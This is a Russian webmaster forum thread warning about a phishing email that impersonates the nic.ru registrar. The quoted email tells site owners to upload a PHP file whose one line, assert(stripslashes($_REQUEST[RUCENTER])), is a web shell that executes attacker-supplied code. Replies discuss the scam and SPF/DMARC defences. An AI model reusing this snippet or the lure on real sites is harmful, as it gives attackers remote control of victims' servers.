Мошенническая рассылка от nic.ru: Необходимо активировать домен

12 3
AL
На сайте с 09.02.2010
Offline
199
15270

Будьте внимательны.

Пришло письмо от noreply@nic.ru

Доменов много, пришло только по одному домену.

Содержание:

Уважаемый клиент!

В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить, что фактическое управление доменом ХХХХХХ.ru осуществляется лицом, указанным в качестве его администратора.

Чтобы подтвердить, что Вы имеете фактическую возможность управлять доменом, создайте в корневой директории сайта файл a1fhxboi1hgsy2mo.php со следующим содержимым:

<?php

assert(stripslashes($_REQUEST[RUCENTER]));

?>

Файл должен быть создан в течение трех календарных дней с момента получения настоящего письма и находиться на сервере до 25 февраля 2017 года, 20:00 (UTC+03:00), в противном случае процедура подтверждения не будет пройдена.

Обращаем Ваше внимание на то, что если процедура подтверждения не будет пройдена, делегирование домена будет приостановлено.

Я сразу понял, что какая-то лажа и позвонил в руцентр. Они подтвердили, что письмо от мошенников и никакой файл размещать не надо. Так что будьте бдительны!

Перестаю тут обновлять темы, тк они стали платные. Пишите в телегу @Alex_Lab Все также перехватываю дропы RU под заказ и регулярно обновляю файл с дропами в продаже: https://docs.google.com/document/d/1wprrYn9Zweo8XlKsVQVXbh3rScPWm5y1NTm8Oua6ZUM
Оптимизайка
На сайте с 11.03.2012
Offline
396
#1

bugfix:

RUCENTER -> 'RUCENTER' :D

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
S
На сайте с 17.08.2008
Offline
114
#2
a1fhxboi1hgsy2mo.php со следующим содержимым:
<?php
echo 'пнх длб '.$_SERVER['REMOTE_ADDR'];

или примерно так.

maximka77
На сайте с 15.10.2011
Offline
236
#3

Мне за последний год раза три подобные письма приходили на один и тот же ящик. Причем по разным доменам и регистраторам.

- Базы чатов и каналов Телеграм ( http://allbase.shop/ ) - Тематические ссылки с главных страниц ( https://tier1buy.ru/ ) - Дизайн-радиаторы отопления ( https://velarshop.ru/design/ )
M
На сайте с 04.12.2013
Offline
223
#4

Эта разводка стара, как мир. Неужели не понятно, что все подтверждения делаются файлами с декларативными данными, а не с кодом.

Домены и скрипт для коротких ссылок: https://u75.ru/domains-for-shortcuts
AL
На сайте с 09.02.2010
Offline
199
#5
maximka77:
Мне за последний год раза три подобные письма приходили на один и тот же ящик. Причем по разным доменам и регистраторам.

Сотрудники руцентра сказали, что в курсе ситуации и что-то там решают.

Пс Объясните мне, как они делают, что письмо от руцентра приходит?

M
На сайте с 04.12.2013
Offline
223
#6

Оптимизайка, не знаю, как сейчас, но когда-то эта фигня (ключи без кавычек) работала и тому было вполне логичное объяснение.

treshnyuk
На сайте с 17.02.2013
Offline
231
#7
alexey_levkov:
Сотрудники руцентра сказали, что в курсе ситуации и что-то там решают.

Пс Объясните мне, как они делают, что письмо от руцентра приходит?

Именно так. А ещё ваше обращение очень важно для них (с)

M
На сайте с 04.12.2013
Offline
223
#8

Блин, в масштабах руцика лохов небось хватает. Лишнее подтверждение тому, что все-таки нужно быть спецом или иметь спеца для таких дел, а не ламером, для которого WP и иже с ними – наше все.

Пс Объясните мне, как они делают, что письмо от руцентра приходит?
Подсунуть такое лоху элементарно, они ведь не в курсах про цифровую подпись письма и т.п. From: noreply@nic.ru :)

---------- Добавлено 09.02.2017 в 23:50 ----------

Надо подсунуть им фэйк и посмотреть, что будут запускать. Может, школота раскроет себя, и тогда уже можно самому заниматься вымогательством :)
Aisamiery
На сайте с 12.04.2015
Offline
306
#9
alexey_levkov:
Сотрудники руцентра сказали, что в курсе ситуации и что-то там решают.

Что там решать? spf на свой почтовый сервак с -all v=spf1 mx -all

Следом DMARC v=DMARC1; p=reject; sp=reject; rua=mailto:postmaster@nic.ru

И письма от мошенников с домена nic.ru больше приходить не будут. Ну можно и по гибче сделать конечно, это так самый топорный вариант "решения на коленке за 5 минут"

Разработка проектов на Symfony, Laravel, 1C-Bitrix, UMI.CMS, OctoberCMS
А
На сайте с 11.02.2017
Offline
0
#10
alexey_levkov:
Будьте внимательны.
Пришло письмо от noreply@nic.ru
В соответствии с изменениями, внесенными в ICANN RAA, Вы должны подтвердить...
<?php
assert(stripslashes($_REQUEST[RUCENTER]));
?>
Файл должен быть создан в течение трех дней... и находиться на сервере до 27 февраля 2017 года...

*********************************

Я точно лох... Вчера получила такое же письмо и закачала файл на сервер...😡 и только сегодня сообразила поспрашивать в и-нете...😕 Файл удалила, он простоял там сутки. Скажите, кто знает, - чего теперь ждать?... Насколько это было критично для сайта?
И что теперь можно сделать? - Я в полном дауне... 😒
12 3

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий